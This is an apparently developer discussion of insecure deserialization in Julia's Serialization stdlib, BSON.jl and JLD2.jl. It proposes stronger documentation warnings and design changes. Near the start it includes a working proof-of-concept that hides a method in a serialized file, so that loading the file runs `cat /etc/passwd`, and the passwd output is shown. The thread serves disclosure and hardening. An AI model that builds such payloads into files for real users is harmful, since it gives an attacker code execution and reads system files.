Deserializing adversarial data is not intended to be secure. Python has a big banner that warns about this. We also have a small warning, but I think it should be more pronounced.
There are similar issues in BSON.jl and JLD2.jl.
For your amusement, here is a proof-of-concept exploit for stdlib deserialization:
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`cat /etc/passwd`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m
String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
In a new REPL session on 1.1.1:
julia> using Serialization
julia> Serialization.deserialize("poc.serialized_jl");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
[...]
On 1.3.0-DEV.511, the exploit is only triggered when we deserialize a second file containing a BigInt afterwards (or the same file twice). I think this is due to world age / invokelatest issues. The failure to trigger could be considered a bug: first sending executable code that helps unpack the remainder of a file is potentially a useful pattern. As such, we should decide whether this is supported.
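To illustrate the general world age mechanism mentioned above (not a diagnosis of what 1.3.0-DEV.511 actually does), here is a minimal sketch. The names `answer` and `define_and_call` are made up for the example. A method added while a function is running is not visible to ordinary calls inside that function, but it is visible through `Base.invokelatest`.

```julia
# Hypothetical generic function with a fallback method.
answer(::Any) = "generic"

function define_and_call()
    # Add a more specific method while this function is already running.
    @eval answer(::Int) = "specialized"
    # An ordinary call still dispatches in the world age this function started in.
    direct = answer(1)
    # invokelatest dispatches in the newest world age and sees the new method.
    latest = Base.invokelatest(answer, 1)
    return direct, latest
end

# On the first call, direct is "generic" and latest is "specialized".
direct, latest = define_and_call()
```

A method that arrives inside a serialized file would be in the same position as the `@eval`'d method here: code that was already running when it was defined does not see it unless it goes through `invokelatest` or returns to top level first.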
So, just add
# Security Properties
None. Totally insecure.
?
I think the big red box in the Python pickle docs is appropriate: "Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source." That would go on both the function docstring and the module description.
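As a rough sketch of what such a warning could look like in a docstring, here is a hypothetical wrapper, `read_trusted`, which is not part of the stdlib. It uses the `!!! warning` admonition syntax that Julia docstrings support. The wording is adapted from the pickle warning and is only a suggestion.

```julia
using Serialization

"""
    read_trusted(path::AbstractString)

Hypothetical wrapper around `Serialization.deserialize`, shown only to
illustrate where a warning admonition could sit in a docstring.

!!! warning
    Deserialization is not secure against erroneous or maliciously
    constructed data. Never deserialize data received from an untrusted
    or unauthenticated source.
"""
read_trusted(path::AbstractString) = deserialize(path)
```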
Tangentially, I don't think the exact behavior exploited in the OP is necessary: when we deserialize a Method, we also insert it into its table, but that seems redundant since we're also deserializing the table farther up the stack. It might be some sort of vestigial code. Removing it should make it much harder to execute arbitrary code just by deserializing data.
> Removing it should make it much harder to execute arbitrary code just by deserializing data.
While I'm all for removing vestigial code, I don't think that we should actively try to make it harder to execute arbitrary code during deserialization.
Security against malicious data can be a design goal or not, and I don't see us sacrificing speed and convenience for this. Clear communication is the best we can do, and an easy-to-understand example (i.e. PoC exploit) goes a long way in explaining why deserialization of untrusted data is bad ("an exploit is proof-by-construction of surprising computational power").
Apart from the need for clearer warnings in the docs, this was the second reason for opening these related issues (code exec during deserialization in stdlib, BSON.jl and JLD2.jl; none of them vulnerabilities, but hopefully shedding more light on why deserialization is insecure in their respective approaches. The bson/jld2 exploit does not trigger during stdlib deserialization, but it does trigger on most ways of accessing the deserialized object, especially REPL printing).
> The bson/jld2 exploit does not trigger during stdlib deserialization, but it does trigger on most ways of accessing the deserialized object, especially REPL printing.
The difference there is huge. Consider:
str = readline(file)
run(str)
That the language lets you do that is unavoidable --- not something we can address directly very easily. But if code execution happens on the first line, we probably want to do something about it.
> I don't think that we should actively try to make it harder to execute arbitrary code during deserialization.
I do --- especially if the "feature" that enables it was unintentional in the first place. I think there are much better alternatives. For example, we could store a manifest in the data file. And/or if deserialization fails, we could print which packages it requires so you can try installing them.
Note that I'm fine with calling method overloads during deserialization, as long as they're loaded via the normal channels and not behind your back hidden in the data file.
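The manifest idea above could look roughly like the following sketch. The helper names (`serialize_with_manifest`, `deserialize_with_manifest`) and the plain-text header layout are assumptions made up for illustration, and `Base.loaded_modules_array` is an internal, unexported function. This does not make deserialization of untrusted files safe; it only reports which packages a file claims to need before any payload is read.

```julia
using Serialization

# Hypothetical helper: write the required package names first, then the payload.
function serialize_with_manifest(path::AbstractString, value, required::Vector{String})
    open(path, "w") do io
        # Plain-text manifest: a count line, then one package name per line.
        println(io, length(required))
        foreach(name -> println(io, name), required)
        serialize(io, value)
    end
end

# Hypothetical helper: refuse to read the payload unless every listed
# package has already been loaded through the normal channels.
function deserialize_with_manifest(path::AbstractString)
    open(path, "r") do io
        n = parse(Int, readline(io))
        required = [readline(io) for _ in 1:n]
        # Internal API (assumption): names of all currently loaded modules.
        loaded = Set(String(nameof(m)) for m in Base.loaded_modules_array())
        missing_pkgs = filter(name -> !(name in loaded), required)
        isempty(missing_pkgs) ||
            error("this file requires packages that are not loaded: ",
                  join(missing_pkgs, ", "))
        return deserialize(io)
    end
end
```

With this layout, a file whose manifest names a package that is not loaded fails with a message listing the missing packages instead of silently pulling in code from the data file.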